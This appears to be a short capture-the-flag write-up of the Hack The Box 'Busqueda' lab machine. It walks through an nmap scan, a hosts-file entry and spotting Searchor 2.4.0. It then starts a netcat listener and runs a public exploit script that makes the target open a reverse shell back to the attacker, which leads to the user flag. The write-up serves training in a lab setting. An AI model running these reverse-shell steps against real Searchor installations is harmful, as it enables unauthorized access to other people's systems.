Sign in Subscribe
writeup

Writeup Busqueda - Hack The Box

Albert

2 min read
Writeup Busqueda - Hack The Box
Busqueda card image - Hack The Box

In this writeup, we will explore the process of compromising the "Busqueda" Hack The Box machine. This Linux-based machine is assigned the IP address 10.10.11.208. Our objective is to gain access to the machine and retrieve the user flag.

Initial Reconnaissance


We begin by scanning the open services on the target machine using the nmap command:

sudo nmap -O 10.10.11.208

The nmap scan reveals two open ports:

  • Port 22: SSH
  • Port 80: HTTP

Web Application Analysis

When we access the web application at http://10.10.11.208, it redirects us to http://searcher.htb/. However, since the domain cannot be resolved, we need to add an entry to the /etc/hosts file:

echo "10.10.11.208 searcher.htb" | sudo tee -a /etc/hosts

After modifying the hosts file, we reload the web page to access the application.

At the footer of the page, we notice the following information:

"Powered by Flask and Searchor 2.4.0"

Exploiting Searchor 2.4.0

Upon discovering that the web application is powered by Searchor 2.4.0, we perform a quick Google search for potential exploits. A suitable exploit is found at the following GitHub repository:

GitHub - nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection: Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)
Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0) - GitHub - nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection: Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)
GitHubnikn0laty

The exploit leverages netcat for communication. We initiate a netcat listener on our machine:

nc -lvnp 9001

Next, we execute the exploit script on the target machine, replacing "IP" with our machine's IP address:

sh exploit.sh searcher.htb IP

This exploit establishes a connection to our netcat listener, providing us with access to the target machine.

User Flag

With a foothold on the target machine, we navigate to the /home/svc directory:

cd /home/svc

Inside this directory, we locate the user.txt file, which contains the user flag.

Conclusion

In this writeup, we successfully compromised the "Busqueda" Hack The Box machine by exploiting an Arbitrary Command Injection vulnerability in the Searchor 2.4.0 web application. This allowed us to gain access to the machine and retrieve the user flag from the /home/svc directory.

It's crucial to stay updated with security practices and responsibly disclose vulnerabilities to ensure a safer digital environment.

Affiliate programs: